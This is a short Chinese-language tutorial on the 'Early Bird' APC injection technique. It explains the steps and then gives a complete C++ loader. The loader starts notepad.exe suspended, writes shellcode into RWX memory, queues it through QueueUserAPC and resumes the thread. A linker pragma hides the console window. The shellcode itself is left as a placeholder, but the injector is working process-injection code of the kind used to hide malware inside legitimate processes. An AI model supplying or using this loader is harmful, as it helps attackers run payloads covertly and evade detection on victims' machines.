APC注入--Early Bird

Early Bird是一种简单而强大的技术，Early Bird本质上是一种APC注入与线程劫持的变体，由于线程初始化时会调用ntdll未导出函数NtTestAlert，该函数会清空并处理APC队列，所以注入的代码通常在进程的主线程的入口点之前运行并接管进程控制权
执行流程：

• 创建一个挂起的进程(通常是windows的合法进程)
• 在挂起的进程内申请一块可读可写可执行的内存空间
• 往申请的空间内写入shellcode
• 将APC插入到该进程的主线程
• 恢复挂起进程的线程
  C++实现代码：

#include <Windows.h>
#include <iostream>
#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[] = <shellcode>;

int main()
{
	LPCSTR lpApplication = "C:\\Windows\\notepad.exe";//32位机器notepad的位置
	SIZE_T shellcodeLen = sizeof(shellcode);
	STARTUPINFO sInfo = { 0 };
	PROCESS_INFORMATION pInfo = { 0 };
	CreateProcessA(lpApplication, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, (LPSTARTUPINFOA)&sInfo, &pInfo);
	HANDLE hProc = pInfo.hProcess;
	HANDLE hThread = pInfo.hThread;

	LPVOID lpvShellAddress = VirtualAllocEx(hProc, NULL, shellcodeLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	PTHREAD_START_ROUTINE ptApcRoutine = (PTHREAD_START_ROUTINE)lpvShellAddress;
	WriteProcessMemory(hProc, lpvShellAddress, shellcode, shellcodeLen, NULL);

	QueueUserAPC(PAPCFUNC(ptApcRoutine), hThread, NULL);
	ResumeThread(hThread);
	return 0;
}